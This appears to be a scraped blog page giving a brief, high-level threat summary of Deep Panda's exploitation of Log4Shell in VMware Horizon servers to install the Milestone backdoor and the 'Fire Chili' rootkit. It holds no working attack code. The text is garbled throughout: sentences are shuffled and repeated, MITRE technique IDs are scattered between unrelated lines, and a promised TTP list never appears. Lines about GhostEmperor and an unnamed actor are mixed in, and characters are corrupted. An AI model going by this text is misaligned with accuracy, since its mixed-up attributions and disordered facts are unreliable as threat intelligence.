![]() ![]() T1059.003: Command and Scripting Interpreter: Windows Command Shell T1027.002: Obfuscated Files or Information: Software Packing A recently analyzed Chinese cyber-espionage and financially-focused threat actor was observed targeting a web server at a U.S.-based research university. T1059.001: Command and Scripting Interpreter: PowerShell This threat actor is primarily targeting firms in the finance, education, beauty, and tourist industries. T1569.002: System Services: Service Execution Deep Panda, a Chinese APT group, took advantage of the well-known Log4Shell vulnerability in VMware Horizon servers to deploy a backdoor, rootkit, and steal sensitive data. The Mitre TTPs commonly used by Deep Panda are: During the attacks, a kernel rootkit called “Fire Chili” was discovered that was digitally signed with stolen certificates from game development companies, allowing it to avoid detection by security software. Milestone is intended to send information on the current system sessions to the remote server. These attacks launched a new PowerShell process that downloaded and executed a series of scripts, culminating in the installation of a Milestone backdoor. GhostEmperor, a new Chinese cyber-espionage group, that is continuously attacking large organizations using Windows in Southeast Asia since at least July 2020. The attacks are carried out initially by exploiting Log4Shell ( CVE-2021-44228) in the vulnerable VMware Horizon servers. For a detailed advisory, download the pdf file hereĭeep Panda, a Chinese APT group, took advantage of the well-known Log4Shell vulnerability in VMware Horizon servers to deploy a backdoor, rootkit, and steal sensitive data. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |